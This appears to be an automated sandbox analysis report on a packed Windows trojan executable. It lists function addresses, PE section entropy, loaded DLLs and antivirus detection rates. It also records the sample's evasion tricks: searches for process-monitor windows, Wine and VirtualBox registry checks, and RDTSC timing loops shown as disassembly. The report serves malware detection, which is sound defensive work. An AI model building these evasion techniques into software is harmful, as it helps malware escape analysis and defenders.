      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00128B0F0_2_00128B0F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00242B060_2_00242B06
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00132B340_2_00132B34
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011EB390_2_0011EB39
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F4B340_2_001F4B34
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001E8B330_2_001E8B33
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0018EB280_2_0018EB28
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00126B240_2_00126B24
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011AB260_2_0011AB26
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00190B5B0_2_00190B5B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000BAB400_2_000BAB40
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001DCB730_2_001DCB73
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0012AB920_2_0012AB92
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025EBA40_2_0025EBA4
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00230BA70_2_00230BA7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000CEB800_2_000CEB80
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0022EBB50_2_0022EBB5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00188B870_2_00188B87
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000B4BA00_2_000B4BA0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001B2BAE0_2_001B2BAE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00156BD50_2_00156BD5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001D0BCB0_2_001D0BCB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00116BE80_2_00116BE8
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001A8BE30_2_001A8BE3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00208BDB0_2_00208BDB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00174C120_2_00174C12
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001A6C030_2_001A6C03
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00238C380_2_00238C38
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F8C390_2_001F8C39
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00150C3E0_2_00150C3E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00212C190_2_00212C19
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00138C5A0_2_00138C5A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001CEC4C0_2_001CEC4C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00110C4A0_2_00110C4A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0025AC440_2_0025AC44
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00260C410_2_00260C41
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00164C650_2_00164C65
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00198C6C0_2_00198C6C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00192C990_2_00192C99
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00256CA10_2_00256CA1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001D4C930_2_001D4C93
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00142C9B0_2_00142C9B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0022ACBB0_2_0022ACBB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000C4CA00_2_000C4CA0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0023AC900_2_0023AC90
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00168CA30_2_00168CA3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00248C9C0_2_00248C9C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001BECA60_2_001BECA6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0018CCD50_2_0018CCD5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001E8CC90_2_001E8CC9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001D8CC60_2_001D8CC6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015CCF40_2_0015CCF4
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001C2CF50_2_001C2CF5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00146CFA0_2_00146CFA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144CE50_2_00144CE5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00218CD50_2_00218CD5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0016CCED0_2_0016CCED
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00246D200_2_00246D20
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0021AD290_2_0021AD29
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00200D2D0_2_00200D2D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0014ED040_2_0014ED04
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00240D350_2_00240D35
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000D6D2E0_2_000D6D2E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0014CD300_2_0014CD30
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000F0D200_2_000F0D20
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0022CD160_2_0022CD16
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001C8D290_2_001C8D29
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00244D110_2_00244D11
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DCD4C0_2_000DCD4C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00212D650_2_00212D65
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DCD5E0_2_000DCD5E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015ED4F0_2_0015ED4F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00216D400_2_00216D40
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001AED7D0_2_001AED7D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00194D6B0_2_00194D6B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001C6D6B0_2_001C6D6B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001D2D6A0_2_001D2D6A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0013AD970_2_0013AD97
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00166D900_2_00166D90
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00182D910_2_00182D91
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001CCDBD0_2_001CCDBD
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00134DB90_2_00134DB9
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00210D8F0_2_00210D8F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001B4DAB0_2_001B4DAB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001CADAD0_2_001CADAD
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0020ED9C0_2_0020ED9C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001E4DA00_2_001E4DA0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001ACDDF0_2_001ACDDF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0019ADDE0_2_0019ADDE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001E6DC70_2_001E6DC7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0014ADF10_2_0014ADF1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F6DF30_2_001F6DF3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001FADE70_2_001FADE7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000ECDF00_2_000ECDF0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011EE150_2_0011EE15
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00112E1B0_2_00112E1B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00222E280_2_00222E28
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F0E030_2_001F0E03
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0023EE070_2_0023EE07
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00132E360_2_00132E36
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00220E0A0_2_00220E0A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00206E0A0_2_00206E0A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00332E720_2_00332E72
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0027EE6E0_2_0027EE6E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000BCE450_2_000BCE45
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00236E750_2_00236E75
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000D2E6D0_2_000D2E6D
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000D0E6C0_2_000D0E6C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00252E400_2_00252E40
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0021CE470_2_0021CE47
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00154E7C0_2_00154E7C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001F2E730_2_001F2E73
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000DEE630_2_000DEE63
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0021EE530_2_0021EE53
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00170E640_2_00170E64
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0017EE640_2_0017EE64
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00122E940_2_00122E94
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0020AEA70_2_0020AEA7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00114EB50_2_00114EB5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0016EEB20_2_0016EEB2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0024CE800_2_0024CE80
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00120EBB0_2_00120EBB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000E8EA00_2_000E8EA0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00250E920_2_00250E92
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000B2EB00_2_000B2EB0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000CAEB00_2_000CAEB0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001A0ED30_2_001A0ED3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0023CEEA0_2_0023CEEA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0015CEC50_2_0015CEC5
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00204EFE0_2_00204EFE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00244EFB0_2_00244EFB
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00234EC00_2_00234EC0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0024AED30_2_0024AED3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00228EDA0_2_00228EDA
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0017CF1E0_2_0017CF1E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0011AF1E0_2_0011AF1E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00124F090_2_00124F09
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00128F0F0_2_00128F0F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00148F240_2_00148F24
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00152F230_2_00152F23
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00252F130_2_00252F13
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0018AF4F0_2_0018AF4F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000C6F520_2_000C6F52
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00214F450_2_00214F45
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001DAF6C0_2_001DAF6C
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_001CEF6F0_2_001CEF6F
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: String function: 000C4C90 appears 77 times
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: String function: 000B7F60 appears 38 times
      Source: 35K4Py4lii.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 35K4Py4lii.exeStatic PE information: Section: ZLIB complexity 0.9994446997549019
      Source: 35K4Py4lii.exeStatic PE information: Section: lkpuruni ZLIB complexity 0.9943657657987127
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@11/2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_000E2070 CoCreateInstance,0_2_000E2070
      Source: C:\Users\user\Desktop\35K4Py4lii.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 35K4Py4lii.exeVirustotal: Detection: 53%
      Source: 35K4Py4lii.exeReversingLabs: Detection: 60%
      Source: 35K4Py4lii.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile read: C:\Users\user\Desktop\35K4Py4lii.exeJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: 35K4Py4lii.exeStatic file information: File size 1922048 > 1048576
      Source: 35K4Py4lii.exeStatic PE information: Raw size of lkpuruni is bigger than: 0x100000 < 0x1ab400

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\35K4Py4lii.exeUnpacked PE file: 0.2.35K4Py4lii.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lkpuruni:EW;jglmqzjr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lkpuruni:EW;jglmqzjr:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: 35K4Py4lii.exeStatic PE information: real checksum: 0x1db854 should be: 0x1e035c
      Source: 35K4Py4lii.exeStatic PE information: section name:
      Source: 35K4Py4lii.exeStatic PE information: section name: .idata
      Source: 35K4Py4lii.exeStatic PE information: section name:
      Source: 35K4Py4lii.exeStatic PE information: section name: lkpuruni
      Source: 35K4Py4lii.exeStatic PE information: section name: jglmqzjr
      Source: 35K4Py4lii.exeStatic PE information: section name: .taggant
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00108009 push 190EB112h; mov dword ptr [esp], edi0_2_00108AEE
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00108049 push 219C10E1h; mov dword ptr [esp], edi0_2_00108066
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144077 push ebp; mov dword ptr [esp], 5B7FA92Ch0_2_00144431
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144077 push eax; mov dword ptr [esp], ecx0_2_0014451B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144077 push edx; mov dword ptr [esp], ebp0_2_001445B8
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144077 push 1C54DDEBh; mov dword ptr [esp], ebx0_2_001445F1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00144077 push 6E69CC4Fh; mov dword ptr [esp], ebx0_2_001446A7
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_0010C077 push ebp; mov dword ptr [esp], 7B267F77h0_2_0010C085
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push ebx; mov dword ptr [esp], edx0_2_002780A4
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 58AD4819h; mov dword ptr [esp], edx0_2_00278114
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 2F88AD41h; mov dword ptr [esp], ebp0_2_00278142
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push edx; mov dword ptr [esp], ecx0_2_00278172
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push ebx; mov dword ptr [esp], ecx0_2_002782C6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push edi; mov dword ptr [esp], edx0_2_002784BF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 432E1CF3h; mov dword ptr [esp], ebp0_2_0027851A
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 77572941h; mov dword ptr [esp], eax0_2_002785B6
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 722910A1h; mov dword ptr [esp], esi0_2_002785E3
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push ecx; mov dword ptr [esp], ebx0_2_0027863B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push esi; mov dword ptr [esp], eax0_2_002786A1
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 69FC626Dh; mov dword ptr [esp], esi0_2_002786FC
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 00AA047Ch; mov dword ptr [esp], edi0_2_00278719
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 5DD19341h; mov dword ptr [esp], ecx0_2_00278769
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 377112ABh; mov dword ptr [esp], edx0_2_0027879B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 1398987Ah; mov dword ptr [esp], eax0_2_002787E2
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push 0450C15Bh; mov dword ptr [esp], ecx0_2_0027885E
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push edx; mov dword ptr [esp], ebx0_2_00278862
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push eax; mov dword ptr [esp], 7DDF4374h0_2_002788AD
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push ebp; mov dword ptr [esp], eax0_2_002788D0
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push esi; mov dword ptr [esp], edx0_2_002788EF
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push eax; mov dword ptr [esp], ebp0_2_0027890B
      Source: C:\Users\user\Desktop\35K4Py4lii.exeCode function: 0_2_00278087 push edx; mov dword ptr [esp], eax0_2_0027899D
      Source: 35K4Py4lii.exeStatic PE information: section name: entropy: 7.978316190775784
      Source: 35K4Py4lii.exeStatic PE information: section name: lkpuruni entropy: 7.953971779266812

      Boot Survival

      barindex
      Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: FilemonclassJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect sandboxes / dynamic malware analysis system (registry check)
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\35K4Py4lii.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 285D22 second address: 285D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FA458C3691Fh 0x0000000d jbe 00007FA458C36916h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 284DFD second address: 284E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2851FA second address: 28520C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C3691Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28520C second address: 285241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA4591E8382h 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FA4591E8385h 0x00000017 popad 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 28904B second address: 2890A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA458C36921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FA458C3691Eh 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 jmp 00007FA458C36923h 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f ja 00007FA458C3691Eh 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jng 00007FA458C36916h 0x00000031 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2890A7 second address: 2890AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2890AB second address: 2890B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 2891FD second address: 289203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\35K4Py4lii.exeRDTSC instruction interceptor: First address: 289203 second address: 289228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 1E62B5FEh 0x0000000c mov esi, dword ptr [ebp+122D2D4Fh] 0x00000012 lea ebx, dword ptr [ebp+12453F83h] 0x00000018 sub dword ptr [ebp+122D1CCCh], ebx 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
